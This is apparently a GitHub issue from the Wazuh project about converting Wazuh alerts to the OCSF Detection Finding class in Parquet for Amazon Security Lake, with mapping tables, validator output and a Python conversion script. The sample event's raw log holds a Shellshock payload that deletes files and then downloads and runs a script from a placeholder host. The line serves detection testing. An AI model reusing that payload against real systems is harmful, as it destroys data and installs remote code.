Closed AlexRuiz7 closed 2 months ago
Has sending the data to a Kinesis Firehose with data transformation to parquet been considered? https://docs.aws.amazon.com/firehose/latest/dev/record-format-conversion.html
Together with the @wazuh/threat-intel team, we have worked on mappings to transform our data to the OCSF schema. To do that, we'll use the Detection Finding (2004) class, added in the v1.1.0 release of OCSF. The first proposal was to use the Security Finding (2001) class, but it was discarded because that class is deprecated in the latest version of OCSF.
| OCSF | Value |
|---|---|
| category_uid | 2 |
| category_name | Findings |
| class_uid | 2004 |
| class_name | Detection Finding |
| type_uid | 200401 |
| metadata.product.name | Wazuh |
| metadata.product.vendor_name | Wazuh, Inc,. |
| metadata.product.version | 4.9.0 |
| metadata.product.lang | en |
| metadata.log_name | Security events |
| metadata.log_provider | Wazuh |
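The `type_uid` in the table is not an independent value: in OCSF it is derived as `class_uid * 100 + activity_id`. A minimal sketch of that arithmetic, using the class UID above and the `activity_id` of 1 used in the event mapping (the helper name `type_uid` is only illustrative):

```python
def type_uid(class_uid: int, activity_id: int) -> int:
    """Derive the OCSF type_uid from the class UID and the activity ID."""
    return class_uid * 100 + activity_id


# Detection Finding (2004) with activity_id 1 gives the value used in the table.
detection_finding_create = type_uid(2004, 1)
```

Deriving the value this way keeps `type_uid` consistent if the `activity_id` ever changes.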
| OCSF (2004) | Wazuh event field |
|---|---|
| activity_id | 1 |
| time | timestamp |
| message | rule.description |
| count | rule.firedtimes |
| finding_info.uid | id |
| finding_info.title | rule.description |
| finding_info.types | input.type |
| finding_info.analytic.category | rule.groups |
| finding_info.analytic.name | decoder.name |
| finding_info.analytic.type | Rule |
| finding_info.analytic.type_id | 1 |
| finding_info.analytic.uid | rule.id |
| risk_score | rule.level |
| finding_info.attacks.tactic.name | rule.mitre.tactic |
| finding_info.attacks.technique.name | rule.mitre.technique |
| finding_info.attacks.technique.uid | rule.mitre.id |
| finding_info.attacks.version | v13.1 |
| unmapped | rule.nist_800_53 |
| severity_id | convert(rule.level) |
| status_id | 99 |
| resources.name | agent.name |
| resources.uid | agent.id |
| unmapped | ['_index', 'location', 'manager.name'] |
| raw_data | full_log |
Originally posted by @IsExec in https://github.com/wazuh/internal-devel-requests/issues/699#issuecomment-1933401673
To verify that these mappings produce OCSF-compliant data, we used the validate tool from amazon-security-lake-ocsf-validation, which had to be updated (link redirects to the updated version), together with the Python CLI module `parquet-tools`.
parquet-tools show parquet/wazuh-event.ocsf.parquet
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
| activity_id | category_name | category_uid | class_name | class_uid | count | message | finding_info | metadata | raw_data | resources | risk_score | severity_id | status_id | time | type_uid | unmapped |
|---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------|
| 1 | Findings | 2 | Detection Finding | 2004 | 1 | Shellshock attack attempt | {'analytic': {'category': 'web,accesslog,attack', 'name': 'web-accesslog', 'type_id': 1, 'uid': '31166'}, 'attacks': {'tactic': {'name': 'Privilege Escalation,Initial Access'}, 'technique': {'name': 'Exploitation for Privilege Escalation,Exploit Public-Facing Application', 'uid': 'T1068,T1190'}, 'version': 'v13.1'}, 'title': 'Shellshock attack attempt', 'types': array(['log'], dtype=object), 'uid': '1707402914.872885'} | {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'} | 000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 162 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'" | [{'name': 'redacted.com', 'uid': '000'}] | 6 | 6 | 99 | 2024-02-08T11:35:14.334-0300 | 200401 | {'data_sources': array(['wazuh-alerts-4.x-2024.02.08', '/var/log/nginx/access.log', |
| | | | | | | | | | | | | | | | | 'redacted.com'], dtype=object), 'nist': array(['SI.4'], dtype=object)} |
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
python validate.py -i ../../wazuh-indexer/integrations/amazon-security-lake/parquet/output -version ocsf_schema_1.1.0
Attempting to Validate File: wazuh-event.ocsf.parquet...
Validating Against Event Class: detection_finding (2004)...
VALID OCSF.
```python
#!/usr/bin/python

# event comes from Filebeat
event = {}


def normalize(level: int) -> int:
    """
    Normalizes rule level into the 0-6 range, required by OCSF.
    """
    # TODO normalization
    return level


def join(iterable, separator=","):
    return separator.join(iterable)


def convert(event: dict) -> dict:
    """
    Converts Wazuh events to OCSF's Detection Finding (2004) class.
    """
    ocsf_class_template = {
        "activity_id": 1,
        "category_name": "Findings",
        "category_uid": 2,
        "class_name": "Detection Finding",
        "class_uid": 2004,
        "count": event["_source"]["rule"]["firedtimes"],
        "message": event["_source"]["rule"]["description"],
        "finding_info": {
            "analytic": {
                "category": join(event["_source"]["rule"]["groups"]),
                "name": event["_source"]["decoder"]["name"],
                "type_id": 1,
                "uid": event["_source"]["rule"]["id"],
            },
            "attacks": {
                "tactic": {
                    "name": join(event["_source"]["rule"]["mitre"]["tactic"]),
                },
                "technique": {
                    "name": join(event["_source"]["rule"]["mitre"]["technique"]),
                    "uid": join(event["_source"]["rule"]["mitre"]["id"]),
                },
                "version": "v13.1",
            },
            "title": event["_source"]["rule"]["description"],
            "types": [
                event["_source"]["input"]["type"]
            ],
            "uid": event["_source"]["id"],
        },
        "metadata": {
            "log_name": "Security events",
            "log_provider": "Wazuh",
            "product": {
                "name": "Wazuh",
                "lang": "en",
                "vendor_name": "Wazuh, Inc,.",
            },
            "version": "1.1.0",
        },
        "raw_data": event["_source"]["full_log"],
        "resources": [
            {
                "name": event["_source"]["agent"]["name"],
                "uid": event["_source"]["agent"]["id"],
            },
        ],
        "risk_score": event["_source"]["rule"]["level"],
        "severity_id": normalize(event["_source"]["rule"]["level"]),
        "status_id": 99,
        "time": event["_source"]["timestamp"],
        "type_uid": 200401,
        "unmapped": {
            "data_sources": [
                event["_index"],
                event["_source"]["location"],
                event["_source"]["manager"]["name"],
            ],
            "nist": event["_source"]["rule"]["nist_800_53"],  # Array
        },
    }

    return ocsf_class_template
```
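The `normalize` function in the script is still a TODO and returns the level unchanged. One possible way to fill it in is sketched below, assuming Wazuh rule levels fall in the 0 to 15 range and targeting the OCSF `severity_id` values 1 (Informational) to 6 (Fatal), with 0 (Unknown) as the fallback. The thresholds in `_LEVEL_UPPER_BOUNDS` are purely illustrative assumptions, not an agreed mapping.

```python
import bisect

# Hypothetical inclusive upper bounds of Wazuh rule levels for OCSF
# severity_id 1..5; any valid level above the last bound maps to 6 (Fatal).
# These thresholds are an assumption made for illustration only.
_LEVEL_UPPER_BOUNDS = [3, 6, 9, 12, 14]


def normalize(level: int) -> int:
    """Map a Wazuh rule level (assumed 0-15) to an OCSF severity_id (0-6)."""
    is_valid = (
        isinstance(level, int)
        and not isinstance(level, bool)
        and 0 <= level <= 15
    )
    if not is_valid:
        return 0  # OCSF "Unknown"
    # bisect_left returns the index of the first bound >= level.
    return bisect.bisect_left(_LEVEL_UPPER_BOUNDS, level) + 1
```

With these example thresholds, levels 0 to 3 map to Informational and level 15 maps to Fatal. The real cut-off points would have to be agreed on before use.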
I'm working on an event generator tool to test the integration and ease its development.
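As a rough idea of what such a generator could look like, here is a minimal sketch that produces events with the fields read by the conversion script. It is not the actual tool: the function name `generate_event`, the index name, the agent and manager values and the log line are hypothetical placeholders, and the rule values are borrowed from the sample event shown earlier.

```python
import json
import random
from datetime import datetime, timezone


def generate_event(rng: random.Random) -> dict:
    """Build one fake Wazuh alert with the fields the converter reads."""
    return {
        "_index": "wazuh-alerts-4.x-sample",  # hypothetical index name
        "_source": {
            "id": f"{rng.randint(10**9, 10**10 - 1)}.{rng.randint(0, 999999)}",
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "full_log": "sample log line",  # placeholder raw log
            "location": "/var/log/nginx/access.log",
            "input": {"type": "log"},
            "decoder": {"name": "web-accesslog"},
            "agent": {"id": "001", "name": "agent-001"},  # hypothetical agent
            "manager": {"name": "manager-001"},  # hypothetical manager
            "rule": {
                "id": "31166",
                "description": "Shellshock attack attempt",
                "level": rng.randint(0, 15),
                "firedtimes": rng.randint(1, 10),
                "groups": ["web", "accesslog", "attack"],
                "nist_800_53": ["SI.4"],
                "mitre": {
                    "id": ["T1068", "T1190"],
                    "tactic": ["Privilege Escalation", "Initial Access"],
                    "technique": [
                        "Exploitation for Privilege Escalation",
                        "Exploit Public-Facing Application",
                    ],
                },
            },
        },
    }


if __name__ == "__main__":
    # Print a few events as newline-delimited JSON.
    rng = random.Random(42)
    for _ in range(3):
        print(json.dumps(generate_event(rng)))
```

Passing in a seeded `random.Random` keeps the random fields reproducible between runs, which helps when comparing converter output. The timestamp still reflects the current time.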
Description
Now that we know how OCSF works, how to encode data in Parquet and how to implement a Logstash pipeline to send events to an S3 bucket from `wazuh-indexer` indexes, we need to bundle it all together and prepare the data before sending it to AWS.

As explained in #113, we need to transform the data during the pipeline, so that it is uploaded to the Amazon Security Lake S3 bucket already in OCSF and Parquet.
To transform the data, we'll explore the use of a Lambda function and a Python script. The main difference between these two approaches is the resources required: the first one needs an auxiliary S3 bucket.
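The Lambda approach could be shaped roughly as follows. This is a sketch under several assumptions: Logstash writes newline-delimited JSON objects to the auxiliary bucket, an S3 "object created" notification triggers the function, and reading, transforming and writing are passed in as callables. The names `make_handler`, `read_object`, `write_object` and `transform` are hypothetical; in a real deployment they would wrap an S3 client, the OCSF conversion and a Parquet encoder.

```python
import json
import urllib.parse
from typing import Callable, Iterator, List, Tuple


def s3_objects(event: dict) -> Iterator[Tuple[str, str]]:
    """Yield (bucket, key) pairs from an S3 notification event."""
    for record in event.get("Records", []):
        bucket = record["s3"]["bucket"]["name"]
        # Object keys arrive URL-encoded in S3 notifications.
        key = urllib.parse.unquote_plus(record["s3"]["object"]["key"])
        yield bucket, key


def make_handler(
    read_object: Callable[[str, str], str],
    write_object: Callable[[str, List[dict]], None],
    transform: Callable[[dict], dict],
) -> Callable[[dict, object], dict]:
    """Build a Lambda-style handler from injected (hypothetical) helpers."""

    def handler(event: dict, context: object) -> dict:
        processed = 0
        for bucket, key in s3_objects(event):
            body = read_object(bucket, key)
            # One JSON document per non-empty line.
            docs = [
                transform(json.loads(line))
                for line in body.splitlines()
                if line.strip()
            ]
            write_object(key, docs)
            processed += len(docs)
        return {"processed": processed}

    return handler
```

Injecting the I/O helpers keeps the handler testable without AWS access. The standalone Python script variant could reuse the same `transform` and skip the auxiliary bucket.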
Tasks
Subtasks
Definition of done
These two proposals will be worked on in parallel. As soon as we get one of them working, we can consider this issue completed. Once that happens, we'll discuss the next steps.